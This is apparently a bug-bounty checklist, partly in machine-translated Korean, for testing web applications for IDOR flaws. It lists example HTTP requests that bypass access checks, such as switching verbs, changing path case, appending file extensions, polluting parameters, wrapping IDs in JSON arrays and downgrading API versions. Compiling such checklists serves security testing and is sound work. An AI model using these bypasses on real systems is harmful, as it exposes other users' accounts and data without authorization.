IDOR 체크리스트

May 03 2023
기본 단계: [ ] 정보 계정 [ ] 보기 및 삭제 및 api_key 생성 [ ] 모든 의견을 읽을 수 있습니다. [ ] 가격 변경 [ ] 동전을 달러에서 유로로 변경합니다. [ ] ID가 md5,base64를 사용하여 인코딩된 경우 ID 디코딩을 시도합니다 등 비즈니스 로직 , 취약점 등록 , 2fa 우회 , 인증 이 리포지토리의 모든 체크리스트 https://github.com/Az0x7/vulnerability-Checklist follow me.

기본 단계:

1. Create two accounts if possible or else enumerate users first. 
2. Check if the endpoint is private or public and does it contains any kind of id param.
3. Try changing the param value to some other user and see if does anything to their account.
4. Done !!

try if you can idor to view image of any profille

[ ] 정보 계정

[ ] api_key 보기 및 삭제 및 생성

[ ] 모든 댓글을 읽을 수 있습니다.

[ ] 가격 변경

[ ] 동전을 달러에서 유로로 변경

[ ] ID가 md5, base64 등을 사용하여 인코딩된 경우 ID를 디코딩하십시오.

GET /GetUser/dmljdGltQG1haWwuY29t
[...]

GET /users/delete/victim_id  ->403
POST /users/delete/victim_id ->200

Instead of this:
GET /api/albums?album_id=<album id>
Try This:
GET /api/albums?account_id=<account id>
Tip: There is a Burp extension called Paramalyzer which will help with this by remembering all the parameters you have passed to a host.

POST /users/delete/victim_id          ->403
POST /users/delete/my_id/..victim_id  ->200

Content-Type: application/xml ->
Content-Type: application/json

GET /file?id=90djbkdbkdbd29dd
GET /file?id=302

GET /admin/profile ->401
GET /Admin/profile ->200
GET /ADMIN/profile ->200
GET /aDmin/profile ->200
GET /adMin/profile ->200
GET /admIn/profile ->200
GET /admiN/profile ->200

GET /api/users/user_id ->
GET /api/users/*

for hashed ID ,create multiple accounts and understand the ppattern application users to allot an iD

search all the endpoints having ID which the search engine may have already indexed

use tools like arjun , paramminer

GET /api_v1/messages ->200
GET /api_v1/messages?user_id=victim_uuid ->200

GET /api_v1/messages?user_id=attacker_id&user_id=victim_id
GET /api_v1/messages?user_id=victim_id&user_id=attacker_id

GET /user_data/2341        -> 401
GET /user_data/2341.json   -> 200
GET /user_data/2341.xml    -> 200
GET /user_data/2341.config -> 200
GET /user_data/2341.txt    -> 200

{"userid":1234,"userid":2542}

{"userid":123} ->401
{"userid":[123]} ->200

{"userid":123} ->401
{"userid":{"userid":123}} ->200

GET /v3/users_data/1234 ->401
GET /v1/users_data/1234 ->200

GET /graphql
[...]
GET /graphql.php?query=
[...]

비즈니스 로직 , 취약점 등록 , 우회 2FA , 인증

이 저장소의 모든 체크리스트

https://github.com/Az0x7/vulnerability-Checklist

나를 따라

  • 링크드인 , 트위터